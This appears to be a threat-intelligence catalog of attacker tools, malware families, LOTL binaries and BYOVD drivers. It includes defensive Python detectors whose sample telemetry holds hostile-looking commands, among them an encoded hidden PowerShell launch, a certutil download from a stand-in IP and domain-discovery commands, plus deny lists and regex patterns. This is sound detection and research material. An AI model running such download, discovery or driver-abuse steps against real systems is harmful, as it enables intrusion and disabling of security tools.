
Attacker Tool & Framework Catalog

Catalog at a Glance

This page aggregates 75+ attacker tools, frameworks, and malware families identified across all threat actor deep-dives into a unified cross-cutting reference. Key findings:

  • Cobalt Strike remains the single most widely adopted tool, used by every nation-state actor category (China, Russia, DPRK, Iran) and the entire ransomware ecosystem
  • ~60% of tools observed in modern intrusions are commodity, open-source, or living-off-the-land --- custom malware is increasingly reserved for high-value targets and later kill chain phases
  • Top 5 tools by actor adoption: Cobalt Strike, Mimikatz, PowerShell (LOTL), Impacket, PsExec
  • Tool convergence is accelerating: nation-state actors increasingly adopt the same commodity/OSS frameworks used by cybercriminals, complicating attribution

Cross-references: Kill Chain Analysis | Defensive Gap Analysis | Research Opportunities


1. Tool Taxonomy

The attacker tooling ecosystem spans eight functional categories, from initial exploitation through persistence and defense evasion.

Attacker Tool Taxonomy (mindmap, rendered here as an indented outline):
    Exploit Frameworks
      Metasploit
      Custom zero-day exploits
      Browser exploit kits
    C2 Frameworks
      Cobalt Strike
      Brute Ratel C4
      Sliver
      Mythic
      Custom implants
    Post-Exploitation
      Mimikatz
      Impacket
      BloodHound
      PowerSploit
    Credential Access
      LaZagne
      HYPERSCRAPE
      Kerberoasting tools
      Browser stealers
    Lateral Movement
      PsExec
      WMI/WMIC
      RDP abuse
      SSH tunneling
    Defense Evasion
      BYOVD tools
      DLL side-loading
      Process injection
      Timestomping
    Reconnaissance
      SharpHound
      Network scanners
      Cloud enumeration
    Loaders & Droppers
      QakBot
      IcedID
      Emotet
      BumbleBee

2. Master Tool Catalog

Exploit Frameworks

Tool | Type | Known Users | First Seen | Status
Metasploit | Commodity / OSS | All actor categories | 2003 | Active
Custom zero-day exploits (Ivanti, Fortinet, Citrix) | Custom | China (Volt Typhoon, APT31, APT5), Iran | Ongoing | Active
MOVEit / GoAnywhere exploits | Custom (0-day) | Ransomware (Cl0p / FIN11) | 2023 | Active
ProxyLogon / ProxyShell chains | Commodity (1-day) | China (Hafnium), Iran, Ransomware | 2021 | Declining

C2 Frameworks

Tool | Type | Known Users | First Seen | Status
Cobalt Strike | Commodity (leaked/cracked) | China, Russia, DPRK, Iran, Ransomware --- virtually universal | 2012 | Active
Brute Ratel C4 | Commodity (cracked builds in circulation) | Ransomware affiliates (Black Basta, BlackCat), some nation-state | 2022 | Active
Sliver | Open-source | Growing adoption across all actor types; Russia (APT29), Ransomware | 2020 | Rising
Mythic | Open-source | Red teams transitioning to adversary adoption; early nation-state use | 2020 | Rising
ShadowPad | Shared (PRC ecosystem) | China --- APT41, Winnti, RedFoxtrot, Earth Lusca, 15+ PRC groups | 2017 | Active
X-Agent / XTunnel | Custom | Russia --- APT28 / GRU Unit 26165 | 2014 | Active
Snake | Custom | Russia --- Turla / FSB Center 16 | 2003 | Disrupted (2023 FBI Operation MEDUSA)

Post-Exploitation & Credential Access

Tool | Type | Known Users | First Seen | Status
Mimikatz | Commodity / OSS | All actor categories --- universal adoption | 2011 | Active
Rubeus | Open-source | Ransomware affiliates, red teams --- Kerberoasting / AS-REP roasting | 2018 | Active
SharpHound / BloodHound | Open-source | Ransomware, nation-state actors --- AD enumeration | 2016 | Active
Impacket | Commodity / OSS | All actor categories --- Python toolkit for SMB, WMI, Kerberos attacks | 2012 | Active
PowerSploit | Commodity / OSS | Broad adoption, declining in favor of newer tools | 2012 | Declining
LaZagne | Open-source | Iran (MuddyWater, OilRig), Ransomware | 2015 | Active
HYPERSCRAPE | Custom | Iran --- APT35 / Charming Kitten email harvesting | 2022 | Active
Browser credential stealers | Custom / Commodity | Ransomware (Qilin --- Chrome credential harvesting pushed via GPO), DPRK, info-stealer malware ecosystem | 2020+ | Rising

Lateral Movement

Tool | Type | Known Users | First Seen | Status
PsExec | LOTL (Sysinternals) | All actor categories --- universal | 1999 | Active
WMI / WMIC | LOTL | All actor categories --- universal | Native | Active
SMBExec | Commodity / OSS | Ransomware, Russia | 2013 | Active
RDP (Remote Desktop Protocol) | LOTL | All actor categories --- primary lateral movement vector for Ransomware | Native | Active
SSH tunneling | LOTL | China (Volt Typhoon), DPRK, Russia | Native | Active

Defense Evasion

Tool | Type | Known Users | First Seen | Status
Terminator (BYOVD) | Commodity (sold on forums) | Ransomware affiliates, DPRK | 2023 | Rising
AuKill (BYOVD) | Commodity | Ransomware (Black Basta, Medusa) | 2023 | Rising
Backstab (BYOVD) | Open-source | Ransomware, DPRK | 2022 | Active
DLL side-loading | Technique | China --- primary evasion technique across 15+ PRC groups | 2010+ | Active
Process injection (various) | Technique | All actor categories | Ongoing | Active
Timestomping | Technique | China, Russia | Ongoing | Active

Loaders & Droppers

Tool | Type | Known Users | First Seen | Status
QakBot / QBot | Commodity (MaaS) | Ransomware ecosystem (Black Basta, REvil) | 2007 | Disrupted (2023), partially resurfaced
IcedID / BokBot | Commodity (MaaS) | Ransomware ecosystem (Conti successors) | 2017 | Declining
Emotet | Commodity (MaaS) | Ransomware ecosystem (historically Conti/Ryuk) | 2014 | Disrupted multiple times, intermittent
BumbleBee | Commodity (MaaS) | Ransomware ecosystem (Conti successors, replaced BazarLoader) | 2022 | Active
PlugX / Korplug | Shared (PRC ecosystem) | China --- used by 15+ PRC groups (APT10, APT41, Mustang Panda, etc.) | 2008 | Active

Custom Malware Families

Malware | Origin | Category | Known Users | Notable For
ShadowPad | China | Modular backdoor | APT41, Winnti, RedFoxtrot, Earth Lusca | Shared across PRC groups; modular plugin architecture
PlugX / Korplug | China | RAT | 15+ PRC groups | Longest-running PRC implant; still actively developed
China Chopper | China | Web shell | APT40, APT41, Hafnium | ~4 KB web shell; trivial to deploy, hard to detect
Winnti | China | Kernel-level backdoor | Winnti Group / APT41 | Kernel rootkit with supply chain deployment
NotPetya | Russia | Wiper (disguised as ransomware) | Sandworm / GRU Unit 74455 | $10B+ in global damage; most destructive cyberattack to date
Industroyer / CrashOverride | Russia | ICS malware | Sandworm / GRU Unit 74455 | Directly manipulates power grid protocols (IEC 61850, IEC 104)
SUNBURST | Russia | Supply chain backdoor | APT29 / SVR (Cozy Bear) | SolarWinds compromise; ~18,000 organizations received the trojanized Orion update
FoggyWeb / MagicWeb | Russia | AD FS backdoor | APT29 / SVR | Targets identity infrastructure; steals tokens and certificates
AppleJeus | DPRK | Crypto-targeting trojan | Lazarus Group | Trojanized cryptocurrency trading applications
FASTCash | DPRK | ATM manipulation | Lazarus Group / BeagleBoyz | Intercepts ISO 8583 transaction messages on payment switches
Shamoon (Disttrack) | Iran | Wiper | APT33 / Elfin | Destroyed ~35,000 Saudi Aramco workstations (2012)
BiBi Wiper | Iran | Wiper (Linux/Windows) | Void Manticore / MOIS-linked | Named after Israeli PM; deployed post-October 2023

3. Shared Tooling Analysis

Attribution Collapse: When Everyone Uses the Same Tools

The dominance of commodity and open-source tooling in modern intrusions has fundamentally undermined tool-based attribution. When a defender finds Cobalt Strike, Mimikatz, and Impacket on a compromised host, the attacker could be any of the following:

  • A PRC espionage team conducting IP theft
  • A GRU unit pre-positioning in critical infrastructure
  • A ransomware affiliate preparing to deploy an encryptor
  • A red team running an authorized assessment

This convergence forces threat intelligence teams to rely on behavioral analysis, infrastructure patterns, victimology, and geopolitical context rather than tool artifacts for attribution --- a significantly higher analytical bar.

The Supply Chain of Attacker Tooling

The attacker tooling ecosystem has its own supply chain dynamics:

  • Leaked tools: a decompiled reconstruction of the Cobalt Strike 4.0 source code surfaced on GitHub in November 2020, and cracked builds circulate freely. Brute Ratel C4 was cracked and leaked within months of gaining traction (a pirated 1.2.2 build was circulating by September 2022). Each leak permanently expands the toolkit available to lower-skill actors.
  • Open-source proliferation: Tools like Sliver, Mythic, and Havoc are developed openly on GitHub. While created for legitimate red team use, they are immediately available to adversaries with no licensing friction.
  • Forum-sold tooling: BYOVD tools (Terminator, AuKill), custom packers, and EDR bypass kits are sold on Russian-language forums (XSS, Exploit) for $300--$5,000.
  • Malware-as-a-Service loaders: QakBot, IcedID, BumbleBee, and Emotet operated as commercial services providing initial access to paying customers --- primarily ransomware affiliates.

This supply chain means that a disruption of any single tool only temporarily degrades attacker capability. When QakBot was taken down in August 2023 (Operation Duck Hunt), ransomware affiliates shifted to IcedID, BumbleBee, Pikabot and DarkGate within weeks.

The Cobalt Strike Problem

Cobalt Strike exemplifies the "shared tooling" challenge. Originally a legitimate red team tool, cracked and leaked versions have proliferated since approximately 2020. Fortra (the current vendor; its predecessor HelpSystems acquired the product in 2020) and law enforcement have attempted takedowns of pirated Cobalt Strike infrastructure, but the tool remains ubiquitous across the threat landscape.

  • Estimated 70%+ of targeted intrusions in 2024 involved Cobalt Strike at some phase (Google TAG / VirusTotal analysis)
  • Fortra, Microsoft's Digital Crimes Unit and Health-ISAC obtained a court order in April 2023 to seize infrastructure hosting cracked copies
  • Despite enforcement efforts, cracked builds remain freely available on underground forums

ShadowPad: China's Shared Malware Service

ShadowPad functions as a shared malware platform across PRC-linked groups --- a "malware-as-a-service" for the Chinese intelligence community. First identified in supply chain attacks in 2017 (NetSarang and CCleaner compromises), it has since been adopted by at least 15 distinct PRC-attributed groups.

  • Modular plugin architecture allows different teams to customize functionality
  • Central development and distribution suggests institutional coordination across MSS and PLA cyber units
  • Represents a maturation of China's offensive cyber program toward shared infrastructure and reduced duplication (Recorded Future, 2023; PwC Threat Intelligence, 2022)

Tool Convergence Trend

Nation-state actors are increasingly adopting commodity and open-source tools that were historically associated with cybercriminals:

Trend | Evidence | Implication
Nation-state adoption of OSS C2 | APT29 using Sliver; PRC groups using Cobalt Strike | Blurred line between state and criminal TTPs
BYOVD going mainstream | DPRK, ransomware groups, and some PRC actors all using Terminator/AuKill | EDR bypass is commoditized
Shared loader ecosystem | Ransomware groups rotate through QakBot, IcedID, BumbleBee as each is disrupted | Loader supply chain is resilient and modular

4. LOTL Binary Catalog

Living-off-the-land (LOTL) techniques use legitimate system binaries and administrative tools for malicious purposes, blending attacker activity with normal operations.

Binary | Legitimate Purpose | Attacker Use | Known Abusers | Detection Approach
PowerShell | Scripting, automation | Download cradles, fileless execution, reconnaissance | All actors --- universal | Script block logging, AMSI, constrained language mode
cmd.exe | Command interpreter | Batch execution, chained commands | All actors | Command-line logging, parent-child process analysis
certutil | Certificate management | File download, Base64 encode/decode | China (Volt Typhoon), Ransomware | Flag -urlcache and -decode usage
mshta | HTML Application host | Execute HTA payloads, bypass application controls | Iran (MuddyWater), Ransomware | Monitor mshta.exe spawning child processes
rundll32 | DLL execution | Load malicious DLLs, proxy execution | China, Russia, Ransomware | Unusual DLL paths, command-line arguments
regsvr32 | COM registration | Proxy execution, AppLocker bypass | Iran, Ransomware | scrobj.dll usage, network connections from regsvr32
wmic | WMI client | Remote execution, reconnaissance, lateral movement | All actors --- universal | Process creation via WMI, unusual WMIC queries
bitsadmin | Background transfer | File download, persistence | China, DPRK | Non-standard transfer jobs, unusual source URLs
net.exe / net1.exe | Network configuration | Account enumeration, group discovery | All actors | Bulk net user / net group commands in sequence
nltest | Domain controller query | Domain trust enumeration | Ransomware, Russia | nltest /dclist, /domain_trusts usage

Note that WMIC is deprecated and, on recent Windows 11 builds, is no longer installed by default; attackers increasingly reach WMI through PowerShell (Get-CimInstance / Invoke-CimMethod) or Impacket's wmiexec instead, so WMI-based detection should key on the WMI provider host (WmiPrvSE.exe spawning processes) rather than on wmic.exe alone.

The Fundamental LOTL Detection Challenge

LOTL techniques represent one of the hardest unsolved problems in defensive security. Every binary listed above has legitimate daily use by system administrators, automation scripts, and enterprise management tools. The attacker's commands are syntactically identical to benign ones.

Traditional signature-based and even basic behavioral detection fails because:

  • The binary is signed by Microsoft and inherently trusted
  • Application allowlists explicitly permit these tools
  • Volume of legitimate use creates overwhelming noise
  • Context (who, when, why) is the only discriminant --- and most security tools lack it

This is the core reason China's Volt Typhoon campaign went undetected for years in U.S. critical infrastructure: they used almost exclusively LOTL techniques, generating no malware artifacts for EDR to flag (CISA Advisory AA24-038A).

Behavioral Detection Opportunities

The LOTL detection gap creates significant market opportunity for vendors who can move beyond binary-level detection to contextual behavioral analysis:

  • Process lineage / causal chain analysis: Tracking parent-child-grandchild process relationships to identify anomalous execution chains (e.g., Outlook spawning PowerShell spawning certutil)
  • User behavior analytics (UBA): Baseline per-user command patterns; flag deviations (a developer account suddenly running nltest and net group commands)
  • Temporal clustering: Detect sequences of LOTL commands that individually appear benign but collectively map to attack patterns (e.g., whoami, net user, nltest, wmic within a 5-minute window)
  • Cross-host correlation: A single LOTL command on one host is invisible; the same command running across 50 hosts in sequence is lateral movement

See Research Opportunities for deeper analysis.
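The four opportunities above can be prototyped against ordinary process-creation telemetry. The Python below is an added example written for this page, not code from any vendor or project named here: it runs command-line discriminants from the LOTL table, a process-lineage check, temporal clustering of discovery commands and a cross-host fan-out check over a handful of constructed Sysmon Event ID 1 / Security 4688 style records. The hosts, users, PIDs, paths and the 203.0.113.10 address are invented, and the regexes and application lists are illustrative starting points rather than a tuned rule set.

```python
"""Context-based LOTL triage over process-creation telemetry (constructed sample data).
Hosts, users, PIDs, paths and the 203.0.113.10 address are invented for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

def _ev(ts, host, user, pid, ppid, image, cmd):
    return {"ts": ts, "host": host, "user": user, "pid": pid, "ppid": ppid, "image": image, "cmd": cmd}

SAMPLE_EVENTS = [
    # WS-017: phishing chain Outlook -> hidden PowerShell -> certutil download cradle
    _ev("2024-03-01T09:00:05", "WS-017", "jdoe", 4100, 900, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE"),
    _ev("2024-03-01T09:00:31", "WS-017", "jdoe", 4220, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    _ev("2024-03-01T09:00:34", "WS-017", "jdoe", 4231, 4220, r"C:\Windows\System32\certutil.exe", r"certutil.exe -urlcache -split -f http://203.0.113.10/u.txt C:\Users\Public\u.txt"),
    # WS-017: discovery burst by the same account inside five minutes
    _ev("2024-03-01T09:01:10", "WS-017", "jdoe", 4300, 4220, r"C:\Windows\System32\whoami.exe", "whoami /all"),
    _ev("2024-03-01T09:01:40", "WS-017", "jdoe", 4310, 4220, r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    _ev("2024-03-01T09:02:15", "WS-017", "jdoe", 4320, 4220, r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    # SRV-01..03: the identical PsExec-delivered command fanning out across hosts
    _ev("2024-03-01T09:10:00", "SRV-01", "svc_backup", 5000, 4980, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c \\FS-01\deploy\run.bat"),
    _ev("2024-03-01T09:12:30", "SRV-02", "svc_backup", 5100, 5080, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c \\FS-01\deploy\run.bat"),
    _ev("2024-03-01T09:15:05", "SRV-03", "svc_backup", 5200, 5180, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c \\FS-01\deploy\run.bat"),
    # WS-020: an administrator's routine use of the same binaries, which should stay quiet
    _ev("2024-03-01T09:20:00", "WS-020", "ops_admin", 6100, 6000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    _ev("2024-03-01T09:20:20", "WS-020", "ops_admin", 6110, 6100, r"C:\Windows\System32\net.exe", "net user bsmith /domain"),
    _ev("2024-03-01T09:21:00", "WS-020", "ops_admin", 6120, 6100, r"C:\Windows\System32\certutil.exe", r"certutil.exe -dump C:\certs\corp.cer"),
]

USER_FACING = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "chrome.exe", "msedge.exe", "acrord32.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe",
           "rundll32.exe", "regsvr32.exe", "bitsadmin.exe", "wmic.exe"}
# Command-line discriminants from the detection column of the table above; illustrative, not exhaustive.
LOLBIN_RULES = [
    ("certutil download/decode", "certutil.exe", r"-(urlcache|decode|encode)\b"),
    ("mshta remote or inline script", "mshta.exe", r"https?://|javascript:|vbscript:"),
    ("regsvr32 scriptlet proxy execution", "regsvr32.exe", r"scrobj\.dll|/i:https?://"),
    ("rundll32 DLL from user-writable path", "rundll32.exe", r"\\(users|programdata|windows\\temp)\\[^\s,]+\.dll"),
    ("powershell hidden/encoded", "powershell.exe", r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden"),
]
# Discovery commands whose sequence, not any single instance, is the signal.
DISCOVERY = {
    "whoami.exe": r".", "systeminfo.exe": r".", "quser.exe": r".", "ipconfig.exe": r"/all",
    "net.exe": r"\b(user|group|localgroup|view)\b", "net1.exe": r"\b(user|group|localgroup|view)\b",
    "nltest.exe": r"/(dclist|domain_trusts|dsgetdc)", "wmic.exe": r"\b(useraccount|group|process|qfe)\b",
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def lolbin_hits(event):
    """Binary-level discriminants: flags and paths that routine administration rarely needs."""
    name = basename(event["image"])
    return [rule for rule, image, pat in LOLBIN_RULES if image == name and re.search(pat, event["cmd"], re.I)]

def ancestry(event, index):
    """Follow ppid links on the same host (cycle-safe); root ancestor first, the event itself last."""
    chain, cur, seen = [], event, set()
    while cur is not None and (cur["host"], cur["pid"]) not in seen:
        seen.add((cur["host"], cur["pid"]))
        chain.append(basename(cur["image"]))
        cur = index.get((cur["host"], cur["ppid"]))
    return chain[::-1]

def suspicious_lineages(events):
    """Process lineage: a user-facing application anywhere above a LOLBin in the tree."""
    index = {(e["host"], e["pid"]): e for e in events}
    chains = [(e["host"], ancestry(e, index)) for e in events if basename(e["image"]) in LOLBINS]
    return [(host, chain) for host, chain in chains if any(a in USER_FACING for a in chain[:-1])]

def first_window(observations, window, min_distinct):
    """Sort (time, value) pairs; return the distinct values of the first window holding >= min_distinct."""
    observations.sort()
    for t0, _ in observations:
        values = {v for t, v in observations if t0 <= t <= t0 + window}
        if len(values) >= min_distinct:
            return tuple(sorted(values))
    return None

def discovery_bursts(events, window=timedelta(minutes=5), min_distinct=3):
    """Temporal clustering: several different discovery tools by one account on one host inside window."""
    per_actor = defaultdict(list)
    for e in events:
        pat = DISCOVERY.get(basename(e["image"]))
        if pat and re.search(pat, e["cmd"], re.I):
            per_actor[(e["host"], e["user"])].append((datetime.fromisoformat(e["ts"]), basename(e["image"])))
    found = {actor: first_window(obs, window, min_distinct) for actor, obs in per_actor.items()}
    return {actor: tools for actor, tools in found.items() if tools}

def cross_host_spread(events, window=timedelta(minutes=30), min_hosts=3):
    """Cross-host correlation: one account running the identical command line on many hosts inside window."""
    per_cmd = defaultdict(list)
    for e in events:
        per_cmd[(e["user"], e["cmd"].lower())].append((datetime.fromisoformat(e["ts"]), e["host"]))
    found = {key: first_window(obs, window, min_hosts) for key, obs in per_cmd.items()}
    return {key: hosts for key, hosts in found.items() if hosts}

if __name__ == "__main__":
    print("cmdline:", [(e["host"], lolbin_hits(e)) for e in SAMPLE_EVENTS if lolbin_hits(e)])
    print("lineage:", suspicious_lineages(SAMPLE_EVENTS))
    print("bursts:", discovery_bursts(SAMPLE_EVENTS), "spread:", cross_host_spread(SAMPLE_EVENTS))
```

In production these checks read from the SIEM rather than an in-memory list, and the thresholds (three distinct discovery tools in five minutes, the same command on three hosts in thirty minutes) have to be tuned per environment. The administrator's lone net user and certutil -dump on WS-020 trigger nothing, which is the point of keying on context rather than on the binary.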


5. Tool Trends

Custom Malware in Decline for Initial Access

Nation-state actors increasingly use commodity tools for initial access and early kill chain phases, reserving custom malware for later-stage persistence and high-value targets. This is a deliberate tradecraft shift --- commodity tools provide plausible deniability and reduce the risk of burning expensive custom capabilities.

  • China post-2020: Volt Typhoon operates almost entirely with LOTL and commodity tools; custom implants are reserved for high-priority persistent access (Microsoft Threat Intelligence, 2023)
  • Exception: supply chain attacks still require custom implants (SUNBURST, 3CX compromise)

Commodity/OSS C2 Framework Adoption Rising

Framework | Trend (2023--2025) | Driver
Sliver | Rapid growth | Free, open-source, and less thoroughly signatured than Cobalt Strike's well-studied Beacon
Mythic | Growing | Modular agent design, agents written in multiple languages
Brute Ratel C4 | Moderate growth | Designed to evade EDR; gaining ransomware adoption
Cobalt Strike | Stable but targeted | Still dominant despite takedown efforts
Havoc | Emerging | New OSS framework with evasion focus

LOTL Usage Intensifying

Chinese threat actors in particular have dramatically increased LOTL usage since approximately 2020, coinciding with the Volt Typhoon campaign's focus on U.S. critical infrastructure pre-positioning. This shift represents a strategic adaptation to improved Western detection of Chinese custom malware.

  • Pre-2020: PRC groups relied heavily on custom backdoors (PlugX, ShadowPad, China Chopper)
  • Post-2020: Volt Typhoon and related clusters use almost exclusively built-in Windows tools
  • Other actors are following: DPRK and Iran groups also increasing LOTL adoption

BYOVD Emerging as Standard EDR Bypass

Bring Your Own Vulnerable Driver (BYOVD) attacks --- where attackers load legitimately signed but vulnerable kernel drivers to disable security tools --- have moved from niche technique to standard ransomware playbook in 2023--2025.

  • The Terminator tool (abusing the Zemana anti-malware driver, zamguard64.sys / zam64.sys) was sold openly on cybercrime forums for $3,000 in 2023
  • AuKill abuses an outdated Process Explorer driver (procexp.sys) to terminate EDR processes
  • The LOLDrivers project (loldrivers.io) catalogs 700+ vulnerable and malicious drivers, publishing file and Authenticode hashes usable directly as block or detection lists
  • Microsoft's Vulnerable Driver Blocklist is the primary mitigation, but it is enforced by default only from Windows 11 2022 Update (22H2) onward and where HVCI, Smart App Control or S mode is on; older builds need it enabled explicitly, so coverage across mixed fleets is inconsistent

BYOVD Commoditization

BYOVD has reached the point where no specialized skill is required --- turnkey tools are available for purchase on forums. This effectively commoditizes kernel-level EDR bypass, undermining the detection layer that most enterprises rely on as their primary defense. Every EDR vendor must now defend against the operating system's own driver trust model.
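The same contextual logic used against LOTL applies to driver loads. The Python below is an added example for this page, not code from LOLDrivers, Microsoft or any EDR vendor: it scores constructed Sysmon Event ID 6 (DriverLoad) style records against a LOLDrivers-style hash deny list, abused filenames, user-writable load paths and signature state, then correlates a flagged load with security-process exits (Event ID 5 style records) on the same host within a short window. The hosts, timestamps and SHA256 values are placeholders (not real driver hashes), and the security-process names are illustrative.

```python
"""BYOVD triage over driver-load and process-exit telemetry (constructed sample data).
Hosts, timestamps and hashes are invented; the SHA256 values are placeholders, not real driver hashes."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A deny list in the spirit of loldrivers.io, keyed by file SHA256. The real project also publishes
# Authenticode hashes, which survive edits outside the signed region; a production list should use both.
VULNERABLE_DRIVERS = {
    "11" * 32: "zamguard64.sys (Zemana anti-malware driver abused by Terminator)",
    "22" * 32: "procexp.sys (Process Explorer driver abused by AuKill)",
}
# Filenames worth flagging even when the hash is unknown (renamed build or a different version).
ABUSED_FILENAMES = {"zamguard64.sys", "zam64.sys", "procexp.sys", "procexp152.sys"}
# Kernel drivers have no business being loaded from user-writable directories.
USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp|temp)\\", re.I)
# Illustrative security-agent process names; substitute the EDR actually deployed.
SECURITY_PROCESSES = {"msmpeng.exe", "csfalconservice.exe", "sentinelagent.exe", "cb.exe"}

def _drv(ts, host, image, sha256, signed, signature, status):
    return {"ts": ts, "host": host, "image": image, "hashes": f"SHA256={sha256},MD5=00",
            "signed": signed, "signature": signature, "sig_status": status}

DRIVER_LOADS = [
    # Known-bad hash, dropped to ProgramData, validly signed: the classic BYOVD pattern
    _drv("2024-03-01T10:00:00", "SRV-DB-02", r"C:\ProgramData\zamguard64.sys", "11" * 32, True, "Zemana Ltd.", "Valid"),
    # Unknown hash but abused filename from a temp directory: a hash list alone would miss this one
    _drv("2024-03-01T11:30:00", "WS-031", r"C:\Windows\Temp\procexp.sys", "33" * 32, True, "Microsoft Corporation", "Valid"),
    # Ordinary storage driver from the drivers directory: should produce no findings
    _drv("2024-03-01T12:00:00", "FS-01", r"C:\Windows\System32\drivers\iaStorV.sys", "44" * 32, True, "Microsoft Windows", "Valid"),
    # Unsigned driver: only loadable with test-signing enabled or a kernel bug
    _drv("2024-03-01T12:05:00", "WS-044", r"C:\Windows\System32\drivers\custom.sys", "55" * 32, False, "", "Unavailable"),
]

PROCESS_ENDS = [
    {"ts": "2024-03-01T10:00:07", "host": "SRV-DB-02", "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe"},
    {"ts": "2024-03-01T10:00:09", "host": "SRV-DB-02", "image": r"C:\Program Files\CrowdStrike\CSFalconService.exe"},
    {"ts": "2024-03-01T11:31:00", "host": "WS-031", "image": r"C:\Windows\System32\notepad.exe"},
    {"ts": "2024-03-01T15:00:00", "host": "SRV-DB-02", "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe"},  # hours later, outside the window
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def parse_hashes(field):
    """Sysmon writes 'SHA256=...,MD5=...'; return {algorithm: hex}."""
    return dict(part.split("=", 1) for part in field.split(",") if "=" in part)

def driver_findings(ev):
    """Independent checks on one DriverLoad record; any non-empty result deserves a look."""
    findings = []
    sha = parse_hashes(ev["hashes"]).get("SHA256", "").lower()
    if sha in VULNERABLE_DRIVERS:
        findings.append("known vulnerable driver: " + VULNERABLE_DRIVERS[sha])
    if basename(ev["image"]) in ABUSED_FILENAMES:
        findings.append("filename matches an abused driver")
    if USER_WRITABLE.match(ev["image"]):
        findings.append("loaded from a user-writable path")
    if not ev["signed"] or ev["sig_status"] != "Valid":
        findings.append("unsigned or invalid signature")
    return findings

def edr_kill_chains(driver_loads, process_ends, window=timedelta(minutes=10)):
    """A flagged driver load followed by security-process exits on the same host within window."""
    exits = defaultdict(list)
    for p in process_ends:
        if basename(p["image"]) in SECURITY_PROCESSES:
            exits[p["host"]].append((datetime.fromisoformat(p["ts"]), basename(p["image"])))
    chains = []
    for d in driver_loads:
        findings = driver_findings(d)
        t0 = datetime.fromisoformat(d["ts"])
        killed = sorted({name for t, name in exits[d["host"]] if t0 <= t <= t0 + window})
        if findings and killed:
            chains.append({"host": d["host"], "driver": d["image"], "killed": killed, "findings": findings})
    return chains

if __name__ == "__main__":
    for d in DRIVER_LOADS:
        print(d["host"], basename(d["image"]), driver_findings(d) or "clean")
    for c in edr_kill_chains(DRIVER_LOADS, PROCESS_ENDS):
        print(f"EDR kill chain on {c['host']}: {c['driver']} then {', '.join(c['killed'])}")
```

The second sample shows why a hash list alone is not enough: a renamed or older procexp.sys with an unlisted hash is still caught by its load path and filename. Preventing the load in the first place is the job of the Microsoft Vulnerable Driver Blocklist or a WDAC policy that denies known-bad Authenticode hashes; the correlation above is the detective control for fleets where that is not yet enforced.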

Cloud-Native Tooling in Attacks

As enterprises migrate to cloud, attackers are following with cloud-native techniques:

  • Azure CLI, AWS CLI, gcloud: Used for cloud reconnaissance, privilege escalation, and data exfiltration
  • Azure AD / Entra ID abuse: Token theft, OAuth app abuse, consent phishing
  • Cloud-specific tools: ROADtools (Azure AD enumeration), Pacu (AWS exploitation framework), ScoutSuite
  • Russia (APT29) and DPRK are the most active cloud-targeting nation-state actors

Knowledge Gap

Cloud-native attacker tooling is evolving rapidly and our catalog likely underrepresents the current state. Tool adoption in cloud environments is less visible to traditional threat intelligence collection methods, which are weighted toward endpoint and network telemetry.

Cross-Platform Malware Rising

Malware written in Rust and Go is increasing across all actor categories, enabling single-codebase targeting of Windows, Linux, and macOS:

  • Royal/BlackSuit ransomware: Rust-based encryptor targeting both Windows and Linux/ESXi
  • BlackCat/ALPHV: First major ransomware written in Rust (2021)
  • Sliver (Go) and Mythic's Go-based agents such as Poseidon: inherently cross-platform
  • DPRK loaders: Multiple DPRK campaigns now use Go-based initial access tools

Defensive Product Implications of Tool Trends

Each trend above creates specific product and investment opportunities:

Trend | Defensive Product Need | Market Segment
LOTL dominance | Behavioral analytics, process lineage tracking | SIEM & SOAR, Endpoint
BYOVD commoditization | Kernel-level integrity monitoring, driver allowlisting | Endpoint
OSS C2 proliferation | Network traffic analysis tuned to Sliver/Mythic/Havoc protocols | Network Security, NDR
Cloud-native attacks | CSPM/CIEM with attack path modeling | Cloud Security, Identity
Cross-platform malware | Unified detection across Windows, Linux, macOS, containers | Endpoint, Cloud Security
Loader ecosystem resilience | Email/web gateway detection of novel loader variants | Email Security

Tool Disruption Effectiveness

Law enforcement and vendor actions have had mixed results against the attacker tooling supply chain:

Action | Target | Year | Outcome
FBI Operation Duck Hunt | QakBot infrastructure | 2023 | Temporarily effective; partial resurfacing within months
Europol Operation Endgame | IcedID, SystemBC, Pikabot, SmokeLoader, BumbleBee | 2024 | Significant disruption; ecosystem adapted to alternatives
Fortra / Microsoft / Health-ISAC legal action | Cracked Cobalt Strike | 2023 | Reduced some infrastructure; cracked copies still widely available
FBI Operation MEDUSA | Turla's Snake malware | 2023 | Successful disruption of a roughly 20-year-old implant network
CISA/NSA/FBI and Five Eyes joint advisory (AA24-038A) | Volt Typhoon LOTL TTPs | 2024 | Awareness raised; detection remains fundamentally difficult

The pattern is clear: disruption works best against centralized infrastructure (C2 servers, loader botnets) and works poorly against distributed knowledge (LOTL techniques, open-source tools, leaked source code). This asymmetry favors continued attacker adoption of decentralized, commodity tooling.


6. Sources

  1. MITRE ATT&CK --- Software and Tools: https://attack.mitre.org/software/
  2. Google TAG Cobalt Strike abuse analysis: https://blog.google/threat-analysis-group/google-tag-efforts-to-counter-cobalt-strike-abuse/
  3. CISA Advisory AA24-038A --- PRC State-Sponsored Actors (Volt Typhoon): https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
  4. Microsoft Threat Intelligence --- Volt Typhoon LOTL analysis (2023): https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/
